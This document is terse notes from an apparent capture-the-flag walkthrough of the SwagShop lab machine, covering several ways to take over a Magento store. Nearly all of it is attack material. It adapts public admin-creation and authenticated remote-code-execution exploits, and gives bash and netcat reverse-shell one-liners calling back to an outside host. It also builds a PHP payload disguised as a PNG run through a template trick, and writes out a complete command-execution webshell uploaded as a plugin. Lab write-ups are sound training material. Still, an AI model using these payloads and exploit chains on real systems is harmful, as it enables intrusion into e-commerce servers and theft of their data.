Copy > php magescan.phar scan:all 10.x.x.x
Copy searchsploit magento
Magento eCommerce- Remote code Execution-37977.py
vi 37977.py
target = http://10.x.x.x/
target_url = target + "/index.php/admin/CmsWysiwyg/directive/index/"
python 37977.py
http://swagshop.htb/index.php/admin/
Gives us Admin credentials!!
forme:forme
Copy -------------------
Authenticated RCE: 37811.py
Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution
vi 37811.py
username='forme'
password='forme'
install_date='Wed, 08 May 2019...' ..from local.xml
-------------------
Errors:
ippsec used path to admin page to help:
python exec.py http://10.x.x.x/index.php/admin/ 'whoami'
-------------------
Other bloggers updated:
userone = br.find_control(name="login[username]", nr=0)
userone.value = username
pwdone = br.find_control(name="login[password]", nr=0)
pwdone.value = password
-------------------
More errors, had to update: from 72 > 2y
request = br.open(url + 'block/tab_orders/period/2y/?isAjax=true', data='isAjax=false&form_key=' + key)
/\
-------------------
python 37811.py http://$IP "whoami" ..error
python 37811.py http://$IP/index.php/admin/ "whoami" ..better
python 37811.py http://$IP/index.php/admin/ "bash -c 'bash -i >& /dev/tcp/10.x.x.x/9001 0>&1'"
nc -nvlp 5555
whoami
www-data
Copy ---------------
http://$IP/index.php/admin/
Login with Admin
System > Magento Connect > Magento Connection Manager
Check Box: Put store on the maintenance mode while installing
Direct Package File Upload > Browse
Magpleasure_Filesystem-1.0.0.tgz
Upload!
nload:
http://connect20.magentocommerce.com/community/Magpleasure_Filesystem/1.0.0/Magpleasure_Filesystem-1.0.0.tgz
---------------
System > Filesystem > IDE
Edit "Cron.php"
Update it with an evil php webshell
Get your shell
http://10.x.x.x/cron.php
Submit a python reverse shell
nc -nvlp 4444
whoami
www-data
Copy http://swagshop.htb/index.php/admin/
Login with Admin
-------------------
Create evil png
echo '<?php' >> shell.php.png
echo 'passthru("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.x.x.x 4444 >/tmp/f");' >> shell.php.png
echo '?>' >> shell.php.png
-------------------
System > Configuration > Advanced > Developer > Template Settings
Allow Symlinks: "Yes"
-------------------
Catalog > Manage
New Category > Manage Categories > Categories > Catalog
Thumbnail Image: Browse "shell.php.png"
http://10.x.x.x/media/catalog/category/shell.php.png ..confirm it worked!
-------------------
Newsletter > Edit Newsletter Template
Add our code block to the "Template Content"
Save Template
Preview Template (to execute)
{{block type=’core/template’ template=’../../../../../../media/catalog/category/shell.php.png’}}
-------------------
Open template to execute the 'symlink' pointed to the evil-png
nc -nvlp 4444
whoami
www-data
Copy http://$IP/magmi/web/magmi.php
http://$IP/index.php/admin/Cms_Wysiwyg/directive/index/
http://$IP/index.php/admin/Cms_Wysiwyg/directive/key/905d7.../
-------------------
vi evil.php
<?php
if (isset($_POST['command'])){
echo "<form action='evil.php' method='post'>
<input type='text' name='command' value=''/>
<input type='submit' value='execute'/>
</form>";
if(function_exists('shell_exec')) {
$command=$_POST['command'];
$output = shell_exec("$command");
echo "<pre>$output</pre>";
}
}
else {
echo "<form action='evil.php' method='post'>
<input type='text' name='command' value=''/>
<input type='submit' value='execute'/>
</form>";
}
?>
-------------------
> zip evil.zip evil.php
Upload new plugins:
click on "choose file" > evil.zip
-------------------
Execute:
http://10.x.x.x/magmi/plugins/evil.php 